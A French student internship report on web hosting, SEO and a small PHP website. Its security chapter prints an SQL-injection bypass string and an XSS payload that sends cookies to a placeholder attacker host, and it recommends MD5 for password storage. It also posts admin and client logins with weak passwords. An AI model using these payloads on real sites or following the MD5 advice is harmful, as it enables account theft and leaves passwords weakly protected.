Cahier-de-Charges-Communication-Digitale-1-1.pdfCahier-de-Charges-Communication-Digitale-1-1.pdf
Cahier-de-Charges-Communication-Digitale-1-1.pdf
 
Épreuve de leçon SII.pptx
Épreuve de leçon  SII.pptxÉpreuve de leçon  SII.pptx
Épreuve de leçon SII.pptx
 
1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
1-IMP-Tuto-Recherche simple avancée-V4-20240425-BS.pptx
 
Newsletter SPW Agriculture en province du Luxembourg du 17-05-24
Newsletter SPW Agriculture en province du Luxembourg du 17-05-24Newsletter SPW Agriculture en province du Luxembourg du 17-05-24
Newsletter SPW Agriculture en province du Luxembourg du 17-05-24
 
Cours mécanique des fluides de l’ingénieur
Cours mécanique des fluides de l’ingénieurCours mécanique des fluides de l’ingénieur
Cours mécanique des fluides de l’ingénieur
 
Résultats enquête RH 2024 Fonction Publique.pdf
Résultats enquête RH 2024 Fonction Publique.pdfRésultats enquête RH 2024 Fonction Publique.pdf
Résultats enquête RH 2024 Fonction Publique.pdf
 
Comment enseigner la langue française en Colombie?
Comment enseigner la langue française en Colombie?Comment enseigner la langue française en Colombie?
Comment enseigner la langue française en Colombie?
 
support de formation Consignation et déconsignation des energies et produits...
support de formation  Consignation et déconsignation des energies et produits...support de formation  Consignation et déconsignation des energies et produits...
support de formation Consignation et déconsignation des energies et produits...
 
Bilan schéma pour réun concertation SDLP V4.pptx
Bilan schéma pour réun concertation SDLP V4.pptxBilan schéma pour réun concertation SDLP V4.pptx
Bilan schéma pour réun concertation SDLP V4.pptx
 
Présentation Webinaire Cohésion - Concevoir et mettre en place une CMDB, comm...
Présentation Webinaire Cohésion - Concevoir et mettre en place une CMDB, comm...Présentation Webinaire Cohésion - Concevoir et mettre en place une CMDB, comm...
Présentation Webinaire Cohésion - Concevoir et mettre en place une CMDB, comm...
 

Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

  • 1. Institut Supérieur des Études Technologiques De Mahdia Département Technologies de l’Informatique Rapport de Stage de Perfectionnement Elaboré par : Mohamed Amine Mahmoudi Période du stage : 11/01/2016 à 07/02/2016 Société d’accueil : EL BOOTIC ©Année Universitaire 2015-2016©
  • 2. Remerciements Au terme de ce stage je tien a exprimer mes respects mais connaissances et mes sincère remerciement au personnels du EL BOOTIC, le directeur de la société AYED HATEM, qui ont contribués à l’élaboration de ce rapport modeste. Ainsi ceux qui mon aidées durant cette période pour effectuer mon stage dans les meilleurs conditions, et je tiens également à remercier virement tous ceux qui m’ont fait preuve d’un grand esprit de collaboration et d’initiative tous les personnels de l’équipe technique et qui m’apportent une aide précieuse par leurs suggestion et leurs conseils. Que tous ceux qui ont contribué de près ou de loin à la réalisation de ce travail trouvent ici l’expression de nos sincères gratitudes.
  • 3. Sommaire Table des matières Introduction générale ...........................................................................................................................1 Chapitre 1 : Présentation du cadre du stage........................................................................................2 I. Introduction ....................................................................................................................2 II. Présentation de la société................................................................................................2 III. Contexte du stage ...........................................................................................................2 IV. Conclusion......................................................................................................................3 Chapitre 2 : Notions théoriques ............................................................................................................4 I. Introduction ....................................................................................................................4 II. Hébergement...................................................................................................................4 1. Définition .................................................................................................................4 2. Types........................................................................................................................4 3. Exemples des hébergeurs .........................................................................................5 III. Références web ..............................................................................................................5 1. Définition .................................................................................................................5 2. Types........................................................................................................................5 IV. Les Failles web ..............................................................................................................6 3. Définition .................................................................................................................6 4. Types des failles.......................................................................................................6 V. Outils de développement ................................................................................................7 1. PHP ..........................................................................................................................7 2. SQL ..........................................................................................................................7 3. Javascript et Jquery ..................................................................................................7 4. Bootstrap ..................................................................................................................7 VI. Conclusion......................................................................................................................7 Chapitre 3 : Spécification des besoins ..................................................................................................8 I. Introduction ....................................................................................................................8 II. Besoins fonctionnels.......................................................................................................8 III. Besoins non fonctionnels ...............................................................................................8 IV. Diagramme de cas d’utilisation ......................................................................................8
  • 4. V. Conclusion......................................................................................................................9 Chapitre 4 : Conception.......................................................................................................................10 I. Introduction ..................................................................................................................10 II. Diagramme de séquence ..............................................................................................10 III. Diagramme de classe....................................................................................................11 IV. Conclusion....................................................................................................................12 Chapitre 5 : Tâches Effectuées............................................................................................................13 I. Introduction ..................................................................................................................13 II. Configuration de l’hébergement web ..........................................................................13 1. Réserver le nom du domaine..................................................................................13 2. FTP.........................................................................................................................14 3. Mail ........................................................................................................................14 4. Base des données....................................................................................................14 5. Autres Tâches.........................................................................................................14 III. Réalisation....................................................................................................................15 1. Partie principale .....................................................................................................15 2. Partie Administrateur .............................................................................................16 3. Partie Client............................................................................................................17 IV. Sécurité du site .............................................................................................................15 1. Faille Injection SQL...............................................................................................18 2. Faille XSS ..............................................................................................................18 3. Cryptage des données.............................................................................................19 V. Conclusion....................................................................................................................19 Conclusion générale .............................................................................................................................20 Bibliographie et Nétographie .............................................................................................................21 Annexe...................................................................................................................................................22
  • 5. Liste des figures Table des Figures Figures 1 : diagramme de cas d’utilisation ................................................................................ 9 Figures 2 : diagramme de séquence ........................................................................................ 10 Figures 3 : diagramme de classe ............................................................................................. 11 Figures 4 : réservation nom du domaine ................................................................................. 13 Figures 5 : Envoyé les fichiers avec Filezilla .......................................................................... 14 Figures 6 : Base des données PhpMyAdmin ........................................................................... 15 Figures 7 : site web en partie principale .................................................................................. 16 Figures 8 : authentification des administrateurs ...................................................................... 16 Figures 9 : tableau de bord pour les administrateurs .............................................................. 17 Figures 10 : Panneau de contrôle pour les clients......................................................................... 17
  • 6. Introduction générale Stage de Perfectionnement Page 1 Introduction générale Dans l’occasion de la période de stage j’examine comment crée une application mobile exactement une version Android, tous les universités et les instituts supérieurs l’étude pratique dans l’étude théorique à partir de stages qui ont la durée des études. Le stage est un moyen qui permet à l’étudiant de s’intégrer dans la vie professionnelle en vue d’avoir une idée générale sur le fonctionnement de l’entreprise. A ce niveau, l’objectif des instituts supérieurs des études technologies est de permet à l’étudiant d’enrichir ses connaissances et de s’adapter à l’environnement de l’entreprise. En effet, mon stage d’ouvrir m’a permis l’occasion de s’intégrer au sien de la vie professionnelle et d’élargir mes connaissances. Finalement, l’objectif de ce stage est de faire une intervention pratique qui me permet d’appliquer mes connaissances scientifiques et techniques relatives au domaine de l’informatique, et de tester mes facultés d’analyse et de synthèse.
  • 7. Chapitre 1 : Présentation du cadre du stage Stage de Perfectionnement Page 2 Chapitre 1 : Présentation du cadre du stage I. Introduction Dans ce chapitre, nous allons présenter en premier lieu la société dans laquelle nous avons effectué notre sujet de travail proposé tout en expliquant ses objectifs ainsi les fonctionnalités nécessaires pour le réaliser. II. Présentation de la société EL BOOTIC est une société spécialisée dans le commerce et la maintenance du matériel informatique, ainsi que dans le développement des logiciels et applications informatiques. EL BOOTIC a été créée le 20 mai 2000 par hatem ayed sous forme de société à responsabilité limitée (SARL). Grâce à la volonté qui anime l’équipe pour fournir les meilleurs services aux clients et la qualité du matériel informatique, EL BOOTIC a rapidement pris sa place sur le marché. Leurs activités sont diverses : vente matériels et accessoires informatiques, maintenance et réparation matériels informatiques et pièces électroniques, développement de logiciels, création des sites WEB, assistance des entreprises. Le stage s’est effectué en précisant sa vocation du développement un site web moderne, efficace, et dans période exacte Son adresse est Av hbib bourguiba Ksibet El Medyouni 5031 III. Contexte du stage Dans l’objectif de maitriser et approfondir nos connaissances déjà acquises, la société el bootic nous a accueillis dans ces locaux. Elle nous a proposé comme sujet de suivre des formations sur les outils bureautiques et approfondir les connaissances dans le développement mobile. Les formations proposées par la société :  Création un site web dynamique & hébergée
  • 8. Chapitre 1 : Présentation du cadre du stage Stage de Perfectionnement Page 3 Les formations consistent à connaitre les différentes fonctionnalités de ces outils, bien maitrisés ces connaissances à l’aide des exemples et des travaux pratiques. IV. Conclusion A travers ce chapitre, nous avons présenté le cadre du projet, identifié à atteindre et le travail à faire. Compte tenu de cela, nous proposant les détails du travail dans le chapitre suivant.
  • 9. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 4 Chapitre 2 : Notions théoriques I. Introduction Avant de commencer le travail, nous présentons quelques notions théoriques utilise dans mon stage. Tout d'abord, nous identifions les mots importants, Cela m'a aidé à compléter le travail requis et les mots techniques au cadre de stage. II. Hébergement 1. Définition Est une entité ayant pour vocation de mettre à disposition des internautes des sites web conçus et gérés par des tiers. Il donne ainsi accès à tous les internautes au contenu déposé dans leurs comptes par les webmestres souvent via un logiciel FTP ou un gestionnaire de fichiers. Pour cela, il maintient des ordinateurs allumés et connectés 24 heures sur 24 à Internet (des serveurs web par exemple) par une connexion à très haut débit (plusieurs centaines de Mb/s), sur lesquels sont installés des logiciels : serveur HTTP (souvent Apache), serveur de messagerie, de base de données... 2. Types  Les hébergements partagés ou mutualisés : Chaque serveur héberge plusieurs sites, jusqu'à plusieurs milliers, et ce dans le but de mutualiser les coûts. Le principal avantage est le prix, le principal inconvénient est que le client mutualisé n'est pas l'administrateur du serveur, il est donc souvent tributaire du bon vouloir de l'hébergeur s'il souhaite une technologie particulière.  Les hébergements dédiés : Le client dispose alors de son propre serveur, et peut en général l'administrer comme il le souhaite, ce qui est le principal avantage de ce type d'offre. Le fournisseur du serveur reste cependant propriétaire du serveur. Les inconvénients sont : le prix
  • 10. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 5 beaucoup plus élevé que les hébergements mutualisés, et le besoin de compétences pour administrer la machine correctement.  L'hébergement virtuel dédié via un hyperviseur qui offre au client la souplesse d'un dédié (le client administre sa machine à sa convenance) en lui fournissant une machine virtuelle qui utilise une partie des ressources d'un serveur (physique) par des techniques de virtualisation (informatique).  Les hébergements dédiés dits « managés », avec « serveur dédié info géré » ou « clés en main » : Le client dispose de son propre serveur mais les techniciens de l'hébergeur s'occupent de sa gestion système. Cette solution est parfaite si vous n'avez aucune connaissance technique sur son administration. Il suffit simplement de déposer son site. Ce type d'hébergement cherche à s'adapter aux besoins. 3. Exemples des hébergeurs  OVH  1and1  Gandi  One  Ikola  Lws  Hostgator  Etc… III. Référencement web 1. Définition C’est l’identifier le site dans les moteurs des recherches, c’est-à-dire l’indexation les pages. 2. Types  Le référencement naturel, il est directement en lien avec les contenus de votre site. Votre positionnement est le révélateur de la bonne compréhension de vos contenus par les moteurs de recherche.  Le référencement manuel est la deuxième clef de votre succès sur internet. Votre position sur Google dépend de votre popularité
  • 11. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 6 mesurée notamment par le nombre de liens de qualité qui pointent vers votre site. D'où la nécessité du référencement manuel.  Le référencement publicitaire, ce sont des liens mis en place depuis des bannières publicitaires, les adwords, les animations, les jeux, les buzz.  Le référencement de localisation (Google maps), il favorisera toutes les requêtes effectuées sur des critères géographiques. IV. Les failles web 1. Définition Une faille c'est en fait une faiblesse dans un code qui peut être exploitée pour détourner un site de sa fonction première. Le pirate va pouvoir récupérer des données confidentielles (comme les infos personnelles des inscrits) ou modifier le comportement du site. Mais heureusement pour nous, il est possible de se protéger de ces fameuses failles. 2. Type des failles  L’injection SQL : L'injection SQL est une méthode d'attaque très fréquemment utilisée dans le monde du hack. Elle consiste à modifier une requête SQL en injectant des morceaux de code non-filtrés, généralement par le biais d'un formulaire.  La faille include : à faille include est également très dangereuse. Comme son nom l'indique, elle exploite une mauvaise utilisation de la fonction include(). Cette fonction est très souvent utilisée pour exécuter du code PHP se situant dans une autre page, et particulièrement pour la connexion à une base de données.  La faille upload : La faille upload est une des failles les plus dangereuses. Vous connaissez sûrement la balise HTML qui permet l'upload de fichier  La faille XSS : (plus officiellement appelée Cross-Site Scripting) est une faille permettant l'injection de code HTML ou JavaScript dans des variables mal protégées.  CSRF : Cross site request forgery  CRLF : Carriage Return Line Feed  Etc.
  • 12. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 7 V. Outils du développement 1. PHP HyperText Preprocessor, plus connu sous son sigle PHP (acronyme récursif), est un langage de programmation libre principalement utilisé pour produire des pages Web dynamiques via un serveur HTTP, mais pouvant également fonctionner comme n'importe quel langage interprété de façon locale. PHP est un langage impératif orienté objet comme C++. PHP a permis de créer un grand nombre de sites web célèbres, comme Facebook, YouTube, Wikipedia, etc. Il est aujourd'hui considéré comme la base de la création des sites Internet dits dynamiques. 2. SQL Sigle de « Structured Query Language », en français langage de requête structurée est un langage informatique normalisé servant à exploiter des bases de données relationnelles. La partie langage de manipulation des données de SQL permet de rechercher, d'ajouter, de modifier ou de supprimer des données dans les bases de données relationnelles. 3. JavaScript et Jquery JavaScript est un langage de programmation de scripts principalement employé dans les pages web interactives mais aussi pour les serveurs. 4. Bootstrap Bootstrap est un framework front-end (HTML5, CSS et JavaScript) spécialement conçu pour le développement d'application web "responsive", c'est-à-dire qui s’adapte automatiquement à différents dispositifs et tailles d'écran (desktop, tablettes, smartphones, ...). VI. Conclusion Dans ce chapitre nous avons eu sur certains mots clés que j’ai utilisés dans le stage et en cours de la création d’application. Quelle sont c'est tâches ?
  • 13. Chapitre 3 : Spécification des besoins Stage de Perfectionnement Page 8 Chapitre 3 : Spécification des besoins I. Introduction Pendant la période de mon stage j'ai fait des tâches, qui sont généralement de création une application mobile de la société. Pour cela je définirai les tâches, qu'on j'ai fait durant la période de stage. II. Besoins fonctionnels Avant la création de l’application il faut définir quelques besoins fonctionnels sont généralement  Partie pour les administrateurs  Partie pour les clients  Sécurité  Vend en ligne  Synthèse statistique III. Besoins non fonctionnels Les besoins non fonctionnels décrivent toutes les contraintes auxquelles est soumis le système pour sa réalisation et son bon fonctionnement.  Ergonomie et souplesse  Rapidité  Efficacité IV. Diagramme de cas d’utilisation
  • 14. Chapitre 3 : Spécification des besoins Stage de Perfectionnement Page 9 Figure 1 : diagramme de cas d’utilisation V. Conclusion Dans ce chapitre on a présenté une étude du système existant, les lacunes qu’il comprend ainsi que les solutions que nous proposons pour pallier ces problèmes, nous avons aussi cité les besoins fonctionnels et non fonctionnels qui sont indispensables pour mieux faciliter le travail à réaliser. Dans le chapitre suivant nous allons aborder l’étude conceptuelle de notre site, tout en mentionnant tous les scénarios possibles, les acteurs, les diagrammes.
  • 15. Chapitre 4 : Conception Stage de Perfectionnement Page 10 Chapitre 4 : Conception I. Introduction Ce chapitre a pour objectif de présenter la solution conceptuelle proposée. En d’autres termes, ce chapitre devrait répondre à la question comment faire. La conception est décrite par un ensemble de diagrammes relevant soit du langage de modélisation UML. II. Diagramme de séquence Figure 2 : Diagramme de séquence
  • 16. Chapitre 4 : Conception Stage de Perfectionnement Page 11 III. Diagramme de classe Figure 3 : Diagramme de classe
  • 17. Chapitre 4 : Conception Stage de Perfectionnement Page 12 IV. Conclusion En clair, comme nous venons de le voir, ce chapitre était consacré, à la conception des diagrammes, de séquence qui nous ont permis de dégager l'architecture générale de notre application représentée ici par ce diagramme de classe qui nous renseigne sur la relation homme Machine de notre application qui sera détaillée dans le prochain chapitre.
  • 18. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 13 Chapitre 5 : Tâches Effectuées I. Introduction Après avoir placé notre projet dans son cadre général, une étape indispensable serait de présenter l’environnement sur lequel se base l’application. Dans ce chapitre, nous allons présenter les outils bureautiques tels que les notions des hébergements web étudié pour améliorer, élargir et bien maitriser nos connaissances. II. Configures de l’Hébergement Web 1. Réserver nom du domaine Dans cadre de stage en va réserver un nom du domaine, tout d’abord je recherche un nom existe, c’est-à-dire le nom n’est pas réserver Exemple.com … Réserver Devarabe.com …n’est pas réservé donc j’acheté. Je utilisé www.whois.com Figure 4 : réservation nom du domaine
  • 19. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 14 2. FTP Après le commander l’hébergement, je crée des comptes FTP (File Transfer Protocol). Ce service permet d’envoi les grands fichiers au serveur du site facilement, par suite je envoyé les fichiers en utilise logiciel Filezilla Figure 5 : Envoyé les fichiers avec Filezilla 3. Mail L’hébergeur offre des nombres des comptés mail et une interface pour contrôle les emails. Il existe plusieurs applications web pour les emails, mais généralement en utilisent  Roundcube  Horde  SquirrelMail 4. Base des données
  • 20. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 15 Pour chaque hébergeur ou par un offre d’hébergement, l’hébergeur donnée un nombre des basées des données (1, 2, 3 ou illimité). J’obtenue 5 basés qui travaille avec phpmyadmin en utilise langage SQL, tout d’abord création du tables et liée entre eux. Lorsque j’installe WordPress les tables créent automatiquement au sien de l’interruption du script d’installation WordPress. Figure 6 : base des données PhpMyAdmin 5. Autre Tâches Au cours de configurations de l’hébergement, je modifie le mot de passe de contrôle panel qui je réservoir à partir de l’hébergement, je respect des normes lorsque en crée le mot de passe comme l’utilisation des caractères minuscule & majuscule, des chiffres et des symboles. Ainsi que je crée les sous domaine c’est-à-dire une racine de site comme suit SOUS_DOMAINE.NOM_SITE.COM. Puis je modifier les paramètres du DNS pour le pointage sur domaine, autrement l’hébergeur fait lé automatiquement. III. Réalisation 1. Partie Principale
  • 21. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 16 C’est la partie accessible par tous les visiteurs du site web, qui en trouvent les informations de la société. Figure 7 : site web en partie principale 2. Partie Administrateur Figure 8 : authentification des administrateurs
  • 22. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 17 Figure 9 : tableau de bord pour les administrateurs 3. Partie Client Figure 10 : Panneau de contrôle pour les clients
  • 23. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 18 IV. Sécuriste du site 1. Faille Injection SQL Cette faille apparaît quand il est possible d'injecter du code SQL dans les requêtes SQL qui sont faites dans une page web. C'est actuellement la "meilleure" vulnérabilité Web en rapport fréquence/surface d'exploitation. Les conséquences d'une faille SQL peuvent être multiples, du contournement de formulaires d'authentification au dump complet de la base de données en passant par l'exécution arbitraire de code. Dans ce premier article, nous allons essayer de nous familiariser avec des injections simples (appelées aussi injections du premier ordre). Exemple : ‘ OR 1=1 OR ‘’=’ Premièrement, le plus important, filtrer les variables dans les formulaires. Moi personnellement j'utilise une fonction PHP qui me permet de savoir s'il y a un espace ou tous autres caractères spéciaux non désirés. Il est aussi important de préciser que si vous protéger votre formulaire par une fonction JavaScript un pirate va recopier votre formulaire et exploiter en local rien de plus facile, alors à ne pas faire. 2. Faille XSS Il existe en fait deux type de XSS :  Le XSS réfléchi (non permanent)  Le XSS stocké (permanent) Exemple : <SCRIPT>ALERT('IL Y A UNE FAILLE XSS')</SCRIPT> Exemple : <IMG SRC="AZERTY.JPG" ONERROR="WINDOW.LOCATION='HTTP://WWW.SITE_DU_HACKER.COM/RECUPERATION_COOKI E.PHP?COOKIE='+DOCUMENT.COOKIE;"> La solution la plus adaptée contre cette faille est d'utiliser la fonction HTMLSPECIALCHARS(). Cette fonction permet de filtrer les symboles du type <, & ou encore ", en les remplaçant par leur équivalent en HTML. Par exemple :  Le symbole & devient &amp;  Le symbole " devient &quot;  Le symbole ' devient &#39;
  • 24. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 19 $PSEUDO = HTMLSPECIALCHARS ($_POST ['PSEUDO']); 3. Cryptage des données Dans la base des données l’insertion des données et sur tout la colonne de mot de passe sera crypte avec la fonction MD5() pour assurer bien la sécurité des comptes des administrateurs et leurs clients V. Conclusion Dans le chapitre réalisation nous avons appelé à présenter les interfaces réalisé dans notre site web pour clarifier les étapes d’utilisation de notre site avec ses deux parties statique et dynamique.
  • 25. Conclusion générale Page 20 Conclusion générale Ce travail a été réalisé dans le cadre de notre stage de perfectionnement de un mois au sein de Institué Supérieur des Etudes Technologique de Mahdia Durant notre stage nous a été bénéfique bien sur le plan théorique que pratique. Ce stage été une bonne occasion pour élargir mes connaissances pratiques pour s’adapter aux nouvelles technologies qui s’améliorent jour pour persister dans un secteur qui s’éveille chaque jour sur des nouvelles innovations. Le projet m’a également donnée l’occasion de mieux de la société de service informatique, leur fonctionnement en interne et vis-à-vis des clients, c’est un milieu qu’il est utile d’appréhender pour débuter sa carrière en tant que développeur. En guise de perspective, une formation techniques d’hébergement sera très intéressent pour suivre les améliorations technologiques, des connaissances en accès seront bien complémentaire à mes connaissances. Pour voir le site : www.lelkol.net/StageDePerfectionnement/ Administrateur : www.lelkol.net/StageDePerfectionnement/admin/ Login : med pass : 123456 Client: www.lelkol.net/StageDePerfectionnement/client/ Login : med pass : azerty
  • 26. Bibliographie et Nétographie Stage de Perfectionnement Page 21 Bibliographie et Nétographie [1] Sylvain Baudoin. « Télécharger Comment Héberger Son Site Web Chez Soi », Paris, 2008, 200p [2] Damien Nouvel. « Création de site web Hébergement de site web », Paris, 2005, 53p [3] Christophe AUBRY. « WordPress 4Un CMS pour créer et gérer blogs et sites Web »,473p [4] Patrick Zemour. « Le guide pratique WordPress Créez et animez vos blogs et sites web », 2012,154p [5] http://guides.ovh.com/ : guide d’utilisation l’hébergeur OVH [6] http://getbootstrap.com/: base des connaissances sur Bootstrap [7] http://www.w3schools.com/bootstrap/: Exemple en ligne en utilisent Bootstrap [8] https://openclassrooms.com/courses/protegez-vous-efficacement-contre-les-failles-web: Tutorial sur les failles web. [9] http://fr.wikipedia.org/wiki/Hébergeur_web : Hébergeur web [10] http://fr.wikipedia.org/wiki/CPanel : Cpanel [11] http://www.networking4all.com/fr/support/certificats+ssl/manuels/cpanel/ : Cpanel [12] http://fr.wikipedia.org/wiki/Hébergement_mutualisé : hébergement mutualisé [13] http://openclassrooms.com/courses/ameliorez-la-visibilite-de-votre-site-grace-au- referencement : Améliorez la visibilité de votre site grâce au référencement [14] http://www.w3c2i.com/faqs/differents-types-de-referencement.html : DIFFÉRENTS TYPES DE RÉFÉRENCEMENT [15] http://www.bases-hacking.org/failles-web.html : Les failles web
  • 27. ANNEXE Stage de Perfectionnement Page 22 Liste des annexes : Annexe 1 : Facture d’hébergement Annexe 2 : Création Base des données sur serveur Annexe 3 : Structure de base des données
  • 28. Annexe 1 : Facture d’hébergement
  • 29. Annexe 2 : Création Base des données sur Serveur
  • 30. Annexe 3 : Structure de la Base des données